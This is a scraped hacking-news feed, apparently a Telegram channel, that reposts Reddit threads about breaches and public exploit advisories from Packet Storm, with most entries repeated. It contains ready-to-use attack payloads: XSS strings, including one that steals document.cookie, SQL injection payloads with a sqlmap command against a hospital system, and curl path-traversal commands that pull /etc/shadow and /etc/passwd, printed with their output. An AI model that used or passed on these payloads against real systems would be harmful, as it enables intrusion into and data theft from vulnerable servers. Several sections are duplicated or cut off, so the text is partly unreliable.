Hacking Articles Tips Tricks Videos Tutorials
Photo
hacking: security in practice
Hacker downloads close to 300k personal ID photos from Estonian gov database
https://external-preview.redd.it/cn5JbZ--LymBKx-bR71oD-DSh60T96msipcxo6KpkB8.jpg?width=640&crop=smart&auto=webp&s=31b2a2bafdacb3b4b4b1b2367ba4bb4b282bee6b submitted by /u/pcaversaccio
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Hacker downloads close to 300k personal ID photos from Estonian gov database
https://external-preview.redd.it/cn5JbZ--LymBKx-bR71oD-DSh60T96msipcxo6KpkB8.jpg?width=640&crop=smart&auto=webp&s=31b2a2bafdacb3b4b4b1b2367ba4bb4b282bee6b submitted by /u/pcaversaccio
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Reddit
From the hacking community on Reddit: Hacker downloads close to 300k personal ID photos from Estonian gov database
Explore this post and more from the hacking community
hacking: security in practice
Are cryptocurrency exchange hacks easier?
Bithumb lost an estimated $30 Million. Bithumb's hack took place on June 19, with about $30 million in tokens stolen, Coinrail: $37.2 Million Before Bithumb, there was Coinrail. The rival South Korean exchange was hacked just over a week before Bithumb.
Thieves took about $37.2 million worth of digital currency, with the bulk of tokens stolen including those of Pundi X and Aston coins.
Bitcoin lost around 11% of its total value in the immediate aftermath of the hack BitGrail: $195 Million Coincheck: $534 Million From 2012 over 45 exchanges have suffered great expoilts. Being a moderator of a subreddit, and exposure to years of experience in the hacking world. I feel its a pattern.
Are cryptocurrency exchanges doing a terrible job in terms of cyber security?
submitted by /u/Simonvilla1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Are cryptocurrency exchange hacks easier?
Bithumb lost an estimated $30 Million. Bithumb's hack took place on June 19, with about $30 million in tokens stolen, Coinrail: $37.2 Million Before Bithumb, there was Coinrail. The rival South Korean exchange was hacked just over a week before Bithumb.
Thieves took about $37.2 million worth of digital currency, with the bulk of tokens stolen including those of Pundi X and Aston coins.
Bitcoin lost around 11% of its total value in the immediate aftermath of the hack BitGrail: $195 Million Coincheck: $534 Million From 2012 over 45 exchanges have suffered great expoilts. Being a moderator of a subreddit, and exposure to years of experience in the hacking world. I feel its a pattern.
Are cryptocurrency exchanges doing a terrible job in terms of cyber security?
submitted by /u/Simonvilla1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Are cryptocurrency exchange hacks easier?
Bithumb lost an estimated $30 Million. Bithumb's hack took place on June 19, with about $30 million in tokens stolen, Coinrail: $37.2...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Denver IP Camera SHO-110 Snapshot Disclosure
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Denver IP Camera SHO-110 suffers from an unauthenticated disclosure of a snapshot.
MD5 |
Download
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110
Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too.
So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream.
PoC:
http://
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Denver IP Camera SHO-110 Snapshot Disclosure
https://3.bp.blogspot.com/-sRAbWielMtM/WWlvVvmDA-I/AAAAAAAAIN8/PunzJUFKKskcHl_zTOrA6xP6ETTvhbejQCLcBGAs/s1600/h46.png
Denver IP Camera SHO-110 suffers from an unauthenticated disclosure of a snapshot.
MD5 |
9c56c41fd6c84e6025c78a7ea70f8fc2Download
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110
Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too.
So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream.
PoC:
http://
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Denver IP Camera SHO-110 Snapshot Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ObjectPlanet Opinio 7.12 Cross Site Scripting
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png ObjectPlanet Opinio version 7.12 suffers from reflective and persistent cross site scripting vulnerabilities.
MD5 |
___________________________
@hacking_Attack
@Hacking_Video
ObjectPlanet Opinio 7.12 Cross Site Scripting
https://4.bp.blogspot.com/-Lnl-ZxRP9Iw/WWlvEVwqA2I/AAAAAAAAIK8/WG2BCM3S_lsUOouuCwhP5sp3j7hYzeO-wCLcBGAs/s1600/h133.png ObjectPlanet Opinio version 7.12 suffers from reflective and persistent cross site scripting vulnerabilities.
MD5 |
9b86eabdb364ff978a10f286fc4d44d6Download # Exploit Title: ObjectPlanet Opinio 7.12 allows Cross-Site Scripting
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Ang Kar Min (https://www.linkedin.com/in/karmin-ang)
# CVE: CVE-2020-26563
# Timeline
- September 2019: Initial discovery
- July 2020: Reported to ObjectPlanet
- August 2020: Fix/patch provided by ObjectPlanet
- July 2021: Published CVE-2020-26563
# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.
# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 is vulnerable to stored Cross-Site Scripting (Stored XSS) and reflected Cross-Site Scripting (Reflected XSS).
# 3. Proof of Concept
### Reflected XSS executed in URL ###
The following payload was executed when injected as part of the URL"/survey/admin/surveyAdmin.do?action=viewSurveyAdmin&surveyId=1234":
“&zwzc4%22%3e%3cinput%20type%3dtext%20autofocus%20onfocus%3dconfirm(1)%2f%2f”
Affected URL:/survey/admin/surveyAdmin.do?
### Stored XSS ###
Stored XSS payload such as “ can be saved in various parameter fields. The malicious payload is executed when a user visits a page that preview or published the payloads.
Stored XSS payload such “ can be saved in various parameter fields and executed when a user visits a page where the payload is retrieved. For example, a survey question can be created as part of a survey to store the malicious payload. When this survey previewed, the payload will be retrieved and trigger the XSS vulnerability.
This stored XSS vulnerability affects any page where the affected parameters are accepted and triggered similarly as described in the previous example.
Affected URL(s) and Parameter(s):
- /survey/admin/question.do
'questionText', 'ratingMinText', 'ratingMaxText', 'ratingNALabel', 'multMinError', 'numError', 'numPrefix', 'numPostfix', 'numReqError', 'dropdownLabel', parameters
- /survey/admin/section.do
'title' parameter
- /survey/admin/sectionText.do
'text' parameter
- /survey/admin/plugin.do
'plugin_survey_closed_message', 'plugin_restrict_nrics', '&plugin_survey_email_content' parameter
- /survey/admin/confirm.do
'confirmMessageKeyParam', ‘org.apache.struts.taglib.html.TOKEN’ parameter
- /survey/admin/folder.do
'msgKey' parameter
- /survey/admin/file.do
'resourceName', ‘resourcePath’ parameter
- /survey/admin/setup.do
'characterEncoding', 'emailForErrors', 'fromEmail', 'language', 'systemBaseUrl' parameters
- /survey/admin/questionList.do?action=viewQuestionList&surveyId=1806
arbitrarily supplied URL parameter
- /survey/admin/resources.do?action=viewResourcesByType&resourceType=8&fileListType=6125&selectedPreviewLocation=&selectedPreviewHeight=&selectedPreviewWidth=&selectedRadioId=select1_©ToPosition=-1&isSimpleLayout=false
arbitrarily supplied URL parameter
- /survey/admin/surveyAdmin.do?action=viewSurveyAdmin&surveyId=3404&isPoll=1
arbitrarily supplied URL parameter
# 4. Remediation
Apply the latest fix/patch from objectplanet.
# 5. Credits
Ang Kar Min (https://www.linkedin.com/in/karmin-ang) Source:packetstormsecurity.com___________________________
@hacking_Attack
@Hacking_Video
Kitploit
ObjectPlanet Opinio 7.12 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
IntelliChoice eFORCE Software Suite 2.5.9 Username Enumeration
https://1.bp.blogspot.com/-_z3KH6wgATQ/WWlvetqx6oI/AAAAAAAAIP0/wJ_a-RmXRcUnD9obiJAgo7XfY0pS1AZPwCLcBGAs/s1600/h82.png
IntelliChoice eFORCE Software Suite version 2.5.9 allows for username enumeration.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
IntelliChoice eFORCE Software Suite 2.5.9 Username Enumeration
https://1.bp.blogspot.com/-_z3KH6wgATQ/WWlvetqx6oI/AAAAAAAAIP0/wJ_a-RmXRcUnD9obiJAgo7XfY0pS1AZPwCLcBGAs/s1600/h82.png
IntelliChoice eFORCE Software Suite version 2.5.9 allows for username enumeration.
MD5 |
3dbce8c7f3ef261ca1360be805297f27Download
IntelliChoice eFORCE Software Suite v2.5.9 Username Enumeration
Vendor: IntelliChoice, Inc.
Product web page: https://www.eforcesoftware.com
Affected version: 2.5.9.6
2.5.9.5
2.5.9.3
2.5.9.2
2.5.9.1
2.5.8.0
2.5.7.20
2.5.7.18
2.5.6.18
2.5.4.6
2.5.3.11
Summary: IntelliChoice is a United States software company that was
founded in 2003, and offers a software title called eFORCE Software
Suite. eFORCE Software Suite is law enforcement software, and includes
features such as case management, court management, crime scene management,
criminal database, dispatching, evidence management, field reporting,
scheduling, court management integration, certification management,
and incident mapping. With regards to system requirements, eFORCE
Software Suite is available as SaaS, Windows, iPhone, and iPad software.
Desc: The weakness is caused due to the login script and how it verifies
provided credentials. Attacker can use this weakness to enumerate valid
users on the affected application via 'ctl00$MainContent$UserName' POST
parameter.
Tested on: Microsoft-IIS/10.0
Microsoft-IIS/8.5
ASP.NET/4.0.30319
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5658
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5658.php
03.05.2021
--
Request/response for existent username:
---------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: eforce
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Invalid password entered for username eforce.
Request/response for non-existent username:
-------------------------------------------
POST /eFORCECommand/Account/Login.aspx HTTP/1.1
__LASTFOCUS:
__EVENTTARGET:
__EVENTARGUMENT:
__VIEWSTATE: Xxx
__VIEWSTATEGENERATOR: 4A5A1A0F
__EVENTVALIDATION: Xxx
ctl00$MainContent$UserName: testingus
ctl00$MainContent$Password: 123456
ctl00$MainContent$btnLogin.x: 20
ctl00$MainContent$btnLogin.y: 7
Response:
Unable to login: User name testingus is not registered.
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
IntelliChoice eFORCE Software Suite 2.5.9 Username Enumeration
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Microsoft Exchange AD Schema Misconfiguration Privilege Escalation
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
The msExchStorageGroup schema class added during Exchange installation can be used to create almost any AD object including users, groups or domain trusts leading to elevation of privilege.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Microsoft Exchange AD Schema Misconfiguration Privilege Escalation
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
The msExchStorageGroup schema class added during Exchange installation can be used to create almost any AD object including users, groups or domain trusts leading to elevation of privilege.
MD5 |
5f885a87a9be3f10bfe9e9e4c08c923cDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Microsoft Exchange AD Schema Misconfiguration Privilege Escalation
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
CloverDX 5.9.0 Code Execution / Cross Site Request Forgery
___________________________
@hacking_Attack
@Hacking_Video
CloverDX 5.9.0 Code Execution / Cross Site Request Forgery
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
CloverDX 5.9.0 Code Execution / Cross Site Request Forgery
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Care2x Integrated Hospital Info System 2.7 SQL Injection
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Care2x Integrated Hospital Info System version 2.7 suffers from multiple remote SQL injection vulnerabilities.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Care2x Integrated Hospital Info System 2.7 SQL Injection
https://3.bp.blogspot.com/-L1ywDwIvHnM/WWlvbqBqi6I/AAAAAAAAIPQ/e-y1sGxHKpMGeO7A8b-5LHWSXrbuRWhUwCLcBGAs/s1600/h73.png
Care2x Integrated Hospital Info System version 2.7 suffers from multiple remote SQL injection vulnerabilities.
MD5 |
2edf1e8741d37582e1ac3205362fd224Download
# Exploit Title: Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection
# Date: 29.07.2021
# Exploit Author: securityforeveryone.com
# Vendor Homepage: https://care2x.org
# Software Link: https://sourceforge.net/projects/care2002/
# Version: =< 2.7 Alpha
# Tested on: Linux/Windows
# Researchers : Security For Everyone Team - https://securityforeveryone.com
DESCRIPTION
In Care2x < 2.7 Alpha, remote attackers can gain access to the database by exploiting a SQL Injection vulnerability via the "pday", "pmonth", "pyear" parameters.
The vulnerability is found in the "pday", "pmonth", "pyear" parameters in GET request sent to page "nursing-station.php".
Example:
/nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=123123&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern=
if an attacker exploits this vulnerability, attacker may access private data in the database system.
EXPLOITATION
# GET /nursing-station.php?sid=sid&lang=en&fwd_nr=&edit=1&retpath=quick&station=station&ward_nr=1&dept_nr=&pday=[SQL]&pmonth=[SQL]&pyear=[SQL]&checkintern= HTTP/1.1
# Host: Target
Sqlmap command: sqlmap.py -r request.txt --level 5 --risk 3 -p year --random-agent --dbs
Payload1: pyear=2021') RLIKE (SELECT (CASE WHEN (9393=9393) THEN 2021 ELSE 0x28 END)) AND ('LkYl'='LkYl
Payload2: pyear=2021') AND (SELECT 4682 FROM (SELECT(SLEEP(5)))wZGc) AND ('dULg'='dULg
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Care2x Integrated Hospital Info System 2.7 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png
Oracle Fatwire version 6.3 suffers from cross site scripting and remote SQL injection vulnerabilities.
MD5 |
Download
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage: https://www.oracle.com/index.html
# Version: 6.3
# Tested on: CentOS
1. Xss
Adt parameter is vulnerable to Xss:
https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=
src="a" onerror=alert(document.cookie);>
2. Path Traversal
https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
3. Blind Sql injection
POST
/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
HTTP/1.1
Host: IPaddress
pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection
https://4.bp.blogspot.com/-IV-83q7tlNU/WWlvNru3JHI/AAAAAAAAIMg/qWmIdM50sJs0a5mqLHfeVDVNkTKQ10wJwCLcBGAs/s1600/h23.png
Oracle Fatwire version 6.3 suffers from cross site scripting and remote SQL injection vulnerabilities.
MD5 |
3c10a991eb8badac274f6dcaed884e44Download
# Exploit Title: Oracle Fatwire 6.3 - Multiple Vulnerabilities
# Date: 29/07/2021
# Exploit Author: J. Francisco Bolivar @Jfran_cbit
# Vendor Homepage: https://www.oracle.com/index.html
# Version: 6.3
# Tested on: CentOS
1. Xss
Adt parameter is vulnerable to Xss:
https://IPADDRESS/cs/Satellite?c=Page&cid=xxxx&pagename=xxxx&adt=
src="a" onerror=alert(document.cookie);>
2. Path Traversal
https://IPADDRESS/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
3. Blind Sql injection
POST
/cs/Satellite?cid=xx&pagename=XXXXXXX/elementIncludesestPractice/b/searchBestPractice
HTTP/1.1
Host: IPaddress
pillar_bp=&subcategory_bp=&htlcd_bp=&id_ex=
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Oracle Fatwire 6.3 Cross Site Scripting / SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Longjing Technology BEMS API version 1.21 suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
Longjing Technology BEMS API version 1.21 suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks.
MD5 |
6a5637ce7d7f32fbc3a3c1f0931505e7Download
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
Vendor: Longjing Technology
Product web page: http://www.ljkj2012.com
Affected version: 1.21
Summary: Battery Energy Management System.
Desc: The application suffers from an unauthenticated arbitrary
file download vulnerability. Input passed through the fileName
parameter through downloads endpoint is not properly verified
before being used to download files. This can be exploited to
disclose the contents of arbitrary and sensitive files through
directory traversal attacks.
Tested on: nginx/1.19.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2021-5657
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php
05.07.2021
--
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/shadow
root:*:18477:0:99999:7:::
daemon:*:18477:0:99999:7:::
bin:*:18477:0:99999:7:::
sys:*:18477:0:99999:7:::
sync:*:18477:0:99999:7:::
games:*:18477:0:99999:7:::
man:*:18477:0:99999:7:::
lp:*:18477:0:99999:7:::
mail:*:18477:0:99999:7:::
news:*:18477:0:99999:7:::
uucp:*:18477:0:99999:7:::
proxy:*:18477:0:99999:7:::
www-data:*:18477:0:99999:7:::
backup:*:18477:0:99999:7:::
list:*:18477:0:99999:7:::
irc:*:18477:0:99999:7:::
gnats:*:18477:0:99999:7:::
nobody:*:18477:0:99999:7:::
_apt:*:18477:0:99999:7:::
$ curl -sk https://10.0.0.8/api/downloads?fileName=../../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Longjing Technology BEMS API 1.21 Remote Arbitrary File Download
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Rconn : Rconn Is A Multiplatform Program For Creating Generic Reverse Connections
Rconn (r[everse] conn[ection]) is a multiplatform program for creating reverse connections. It lets you consume services that are behind NAT and/or firewall without adding firewall rules or port-forwarding. This is achieved by creating a connection from the node behind the firewall/NAT to a port on your local machine, and then a port is exposed in […]
The post Rconn : Rconn Is A Multiplatform Program For Creating Generic Reverse Connections appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Rconn : Rconn Is A Multiplatform Program For Creating Generic Reverse Connections
Rconn (r[everse] conn[ection]) is a multiplatform program for creating reverse connections. It lets you consume services that are behind NAT and/or firewall without adding firewall rules or port-forwarding. This is achieved by creating a connection from the node behind the firewall/NAT to a port on your local machine, and then a port is exposed in […]
The post Rconn : Rconn Is A Multiplatform Program For Creating Generic Reverse Connections appeared first on Kali Linux Tutorials.
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
Rconn : Multiplatform Program For Creating Generic Reverse Connections
Rconn (r[everse] conn[ection]) is a multiplatform program for creating reverse connections. It lets you consume services that are behind NAT.